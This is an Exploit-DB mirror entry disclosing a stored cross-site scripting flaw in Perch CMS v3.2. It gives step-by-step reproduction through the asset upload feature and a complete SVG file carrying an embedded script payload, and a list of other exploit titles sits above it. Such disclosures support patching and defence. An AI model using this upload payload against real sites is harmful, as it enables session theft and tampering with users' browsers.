bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51627.txt
Exploit-DB c18d9953a2 DB: 2023-07-29 
22 changes to exploits/shellcodes/ghdb

Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping

Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities

Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS)

Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities

Joomla HikaShop 4.7.4 - Reflected XSS

Joomla VirtueMart Shopping Cart 4.0.12 - Reflected XSS

mooDating 1.2 - Reflected Cross-site scripting (XSS)

October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)

PaulPrinting CMS - (Search Delivery) Cross Site Scripting

Perch v3.2 - Persistent Cross Site Scripting (XSS)

RosarioSIS 10.8.4 - CSV Injection

WordPress Plugin AN_Gradebook 5.0.1 - SQLi

Zomplog 3.9 - Cross-site scripting (XSS)

zomplog 3.9 - Remote Code Execution (RCE)
copyparty 1.8.2 - Directory Traversal
copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)

GreenShot  1.2.10 - Insecure Deserialization Arbitrary Code Execution

mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory

Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)
2023-07-29 00:16:43 +00:00

34 lines
No EOL
1.4 KiB
Text
Raw Blame History

# Exploit Title: Perch v3.2 - Persistent Cross Site Scripting (XSS)
# Google Dork: N/A
# Date: 23-July-2023
# Exploit Author: Dinesh Mohanty
# Vendor Homepage: https://grabaperch.com/
# Software Link: https://grabaperch.com/download
# Version: v3.2
# Tested on: Windows
# CVE : Requested
# Description:
Stored Cross Site Scripting (Stored XSS) Vulnerability is found in the file upload functionally under the create asset section.
#Steps to Reproduce
User needs to login into the application and needs to follow below steps:
1. Login into the application
2. From the left side menu go to Assets (http://URL/perch/core/apps/assets/)
3. Click on "Add assets" and fill all other details (Please note not all the text fields are vulnerable to XSS as they have output encoding)
4. Create the SVG file with below contents say xss.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>
4. In the File upload section upload the above SVG file and submit
5. Now go to above SVG directly say the file is xss.svg
6. go to svg file (http://URL/perch/resources/xss.svg) or you can view all Assets and view the image
7. One can see that we got an XSS alert.
Reference in a new issue View git blame Copy permalink